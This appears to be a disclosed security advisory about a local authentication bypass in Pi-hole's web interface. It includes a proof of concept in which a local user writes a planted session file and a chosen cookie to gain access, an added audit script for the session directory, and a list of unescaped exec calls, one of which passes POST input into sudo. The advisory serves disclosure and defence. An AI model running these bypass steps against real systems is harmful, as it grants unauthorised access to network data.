Summary
Web authentication bypass with local system access via world writable permissions.
Severity
High - Allows attackers to bypass web authentication.
Proof of Concept
Local System Users can bypass Web Interface Authentication
It’s possible for a local user (non-root & non-pihole) to write to /var/lib/php/sessions to bypass the web interface’s login page.
root@2f496b742755:/# apt update && apt install curl -y
root@2f496b742755:/# useradd -m -s /bin/bash test
root@2f496b742755:/# su - test
test@2f496b742755:~$ curl 'localhost/admin/api.php?status&versions='
{"core_update":false,"web_update":false,"FTL_update":false,"docker_update":false,"core_current":"v5.17.1","web_current":"v5.20.1","FTL_current":"v5.23","docker_current":"2023.05.2","core_latest":"v5.17.1","web_latest":"v5.20.1","FTL_latest":"v5.23","docker_latest":"2023.05.2","core_branch":"master","web_branch":"master","FTL_branch":"master"}
test@2f496b742755:~$ curl -b "persistentlogin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 'localhost/admin/api_db.php?status&network='
test@2f496b742755:~$ UMASK=0777 echo 1689793078 > /var/lib/php/sessions/ph_plt_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt
test@2f496b742755:~$ curl -b "persistentlogin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 'localhost/admin/api_db.php?status&network='
{"network":[{"id":1,"hwaddr":"02:42:28:c7:59:64","interface":"eth2","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["172.18.0.1"],"name":[""]},{"id":2,"hwaddr":"00:00:00:00:00:00","interface":"lo","firstSeen":1689191102,"lastQuery":1689191140,"numQueries":4,"macVendor":"virtual interface","aliasclient_id":null,"ip":["127.0.0.1"],"name":["localhost"]},{"id":3,"hwaddr":"02:42:0a:00:05:03","interface":"eth1@if127","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["10.0.5.3"],"name":[""]},{"id":4,"hwaddr":"02:42:ac:12:00:03","interface":"eth2@if129","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["172.18.0.3"],"name":[""]},{"id":5,"hwaddr":"02:42:0a:00:00:0f","interface":"eth0@if131","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["10.0.0.15"],"name":[""]},{"id":6,"hwaddr":"02:42:0a:00:00:06","interface":"eth0","firstSeen":1689191160,"lastQuery":1689191146,"numQueries":3,"macVendor":"","aliasclient_id":null,"ip":["10.0.0.6"],"name":[""]},{"id":7,"hwaddr":"ip-::","interface":"N\/A","firstSeen":1689191160,"lastQuery":1689191140,"numQueries":14,"macVendor":"","aliasclient_id":null,"ip":["::"],"name":["pi.hole"]}],"message_count":0}
From the Chrome console a user can simply set a persistentlogin cookie to "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" and refresh the page.
Note that it is the Debian php package itself that installs /var/lib/php/sessions with world-writable permissions (mode 1733, drwx-wx-wt: any local user can create files in it even though they cannot list it).
root@f612b9a22be3:/# apt update && apt install php -y
root@f612b9a22be3:/# ls -ld /var/lib/php/sessions/
drwx-wx-wt 2 root root 4096 Jul 13 2022 /var/lib/php/sessions/
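As an added defender-side check, not part of the original report or the Pi-hole project, the following POSIX shell script audits a PHP session directory for the two conditions behind this bypass: the directory being world-writable, and entries in it owned by a user other than the PHP/web-server account (what a locally planted session or persistent-login file looks like). The default path comes from the report; the expected owner name www-data is an assumption and should be set to the account the web server actually runs as. It relies on GNU stat, as shipped in Debian coreutils.

```shell
#!/bin/sh
# Added example (not from the original report): audit a PHP session directory
# for the conditions behind this bypass. Requires GNU stat (Debian coreutils).
#
#  1. Is the directory world-writable? Debian's php package ships
#     /var/lib/php/sessions as 1733 (drwx-wx-wt), so any local user can create
#     files in it even though they cannot list it.
#  2. Are there entries in it owned by someone other than the PHP user? A
#     session or persistent-login file planted by a local user carries that
#     user's uid, not the web server's.
#
# The expected owner "www-data" is an assumption; set it to the account your
# web server actually runs as.

# Exit status 0 when the "other" class of $1 has the write bit, 1 when it does
# not, 2 when the path cannot be stat'ed.
dir_world_writable() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 2
    other=$(( mode % 10 ))          # last octal digit = permissions for "other"
    [ $(( other & 2 )) -ne 0 ]      # bit value 2 = write
}

# Print every entry in directory $1 not owned by user $2, one per line.
# Exit status 0 when all entries are owned by $2, 1 when at least one is not.
files_not_owned_by() {
    dir=$1
    owner=$2
    found=0
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || continue     # skip unmatched glob patterns
        if [ "$(stat -c '%U' "$f")" != "$owner" ]; then
            printf '%s\n' "$f"
            found=1
        fi
    done
    return $found
}

# Run both checks and report. Exit status 0 = clean, 1 = at least one finding.
audit_session_dir() {
    dir=${1:-/var/lib/php/sessions}
    owner=${2:-www-data}
    rc=0
    if dir_world_writable "$dir"; then
        echo "RISK: $dir is world-writable (mode $(stat -c '%a' "$dir")); any local user can plant session files"
        rc=1
    else
        echo "ok: $dir is not world-writable"
    fi
    if ! files_not_owned_by "$dir" "$owner" >/dev/null; then
        echo "RISK: entries in $dir not owned by $owner:"
        files_not_owned_by "$dir" "$owner"
        rc=1
    else
        echo "ok: all entries in $dir are owned by $owner"
    fi
    return $rc
}

# Usage: audit_session_dir [directory] [expected-owner]
# audit_session_dir /var/lib/php/sessions www-data
```

On a stock Debian install the first check fires by design (the sticky bit stops users deleting each other's files but does nothing to stop creating them), so the second check is the one that distinguishes a planted file from normal operation: a session directory that only the PHP process writes to should contain nothing owned by anyone else.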
Further Analysis
Most system calls go through pihole_execute(), which wraps commands with escapeshellcmd(). A few system calls, however, are not wrapped by escapeshellcmd():
# grep exec\( -R AdminLTE/*.php | grep -v pihole_execute | grep -v stmt
AdminLTE/settings.php: $timezone = shell_exec("date +'%Z'");
AdminLTE/settings.php: $FTLversion = exec('/usr/bin/pihole-FTL version');
# grep exec\( -R AdminLTE/scripts/pi-hole/php/*.php | grep -v '$db'
AdminLTE/scripts/pi-hole/php/func.php: exec($command, $output, $return_status);
AdminLTE/scripts/pi-hole/php/func.php: return shell_exec('pidof pihole-FTL');
AdminLTE/scripts/pi-hole/php/func.php: return trim(exec('ps -p '.$FTLpid.' -o '.$arg));
AdminLTE/scripts/pi-hole/php/header_authenticated.php:$nproc = shell_exec('nproc');
AdminLTE/scripts/pi-hole/php/savesettings.php: exec('sudo pihole -a theme '.$_POST['webtheme']);
AdminLTE/scripts/pi-hole/php/teleporter.php: exit('cannot open/create '.htmlentities($archive_file_name)."<br>\nPHP user: ".exec('whoami')."\n");
Timeline
Date reported: 07/14/2023
Date fixed:
Date disclosed: 09/06/2024